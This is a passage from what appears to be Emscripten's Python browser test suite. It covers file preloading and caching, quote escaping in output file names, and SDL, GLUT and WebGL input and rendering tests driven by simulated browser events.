self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = path_from_root('tests/manual_download_data.cpp')
create_test_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
